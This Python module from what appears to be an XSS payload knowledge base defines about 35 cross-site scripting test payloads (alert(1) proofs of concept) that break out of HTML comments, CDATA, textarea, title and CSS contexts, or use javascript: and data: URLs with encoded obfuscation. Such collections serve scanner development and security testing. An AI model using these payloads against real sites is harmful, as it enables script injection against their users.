#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Context Specific Core Payloads - Part 3
"""

from typing import Dict

from ..models import PayloadEntry


CONTEXT_SPECIFIC_CORE_PAYLOADS_PART3: Dict[str, PayloadEntry] = {
    "context_specific_071": PayloadEntry(
        payload="data:text/html,<img src=x onerror=alert(1)>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_072": PayloadEntry(
        payload="data:text/html,<body onload=alert(1)>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_073": PayloadEntry(
        payload="javascript:alert%281%29",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_074": PayloadEntry(
        payload="javascript:alert%28String.fromCharCode%2888,83,83%29%29",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_075": PayloadEntry(
        payload="javascript:%61%6C%65%72%74%28%31%29",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_076": PayloadEntry(
        payload="javascript:\\u0061\\u006C\\u0065\\u0072\\u0074(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_077": PayloadEntry(
        payload="javascript:\\x61\\x6C\\x65\\x72\\x74(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_078": PayloadEntry(
        payload="#javascript:alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_079": PayloadEntry(
        payload="#<script>alert(1)</script>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_080": PayloadEntry(
        payload="#<svg onload=alert(1)>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_081": PayloadEntry(
        payload="--><script>alert(1)</script><!--",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_082": PayloadEntry(
        payload="--!><script>alert(1)</script><!--",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_083": PayloadEntry(
        payload="--><svg onload=alert(1)><!--",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_084": PayloadEntry(
        payload="--><img src=x onerror=alert(1)><!--",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_085": PayloadEntry(
        payload="]]><script>alert(1)</script><![CDATA[",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_086": PayloadEntry(
        payload="]]><svg onload=alert(1)><![CDATA[",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_087": PayloadEntry(
        payload="--><script>alert(1)</script><!--[if IE]>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_088": PayloadEntry(
        payload="--><script>alert(1)</script><![endif]-->",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_089": PayloadEntry(
        payload="*/alert(1);/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_090": PayloadEntry(
        payload="*/</script><script>alert(1)</script>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_091": PayloadEntry(
        payload="*/<script>alert(1)</script>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_092": PayloadEntry(
        payload="</textarea><script>alert(1)</script><textarea>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_093": PayloadEntry(
        payload="</textarea><svg onload=alert(1)><textarea>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_094": PayloadEntry(
        payload="</textarea><img src=x onerror=alert(1)><textarea>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_095": PayloadEntry(
        payload="</textarea><body onload=alert(1)><textarea>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_096": PayloadEntry(
        payload="</TEXTAREA><script>alert(1)</script><TEXTAREA>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_097": PayloadEntry(
        payload="</TextArea><script>alert(1)</script><TextArea>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_098": PayloadEntry(
        payload="</textarea><script>alert(1)</script><textarea disabled>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_099": PayloadEntry(
        payload="</textarea><script>alert(1)</script><textarea readonly>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_100": PayloadEntry(
        payload="</title><script>alert(1)</script><title>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_101": PayloadEntry(
        payload="</title><svg onload=alert(1)><title>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_102": PayloadEntry(
        payload="</title><img src=x onerror=alert(1)><title>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_103": PayloadEntry(
        payload="</title><body onload=alert(1)><title>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_104": PayloadEntry(
        payload="</TITLE><script>alert(1)</script><TITLE>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_105": PayloadEntry(
        payload="</Title><script>alert(1)</script><Title>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
}
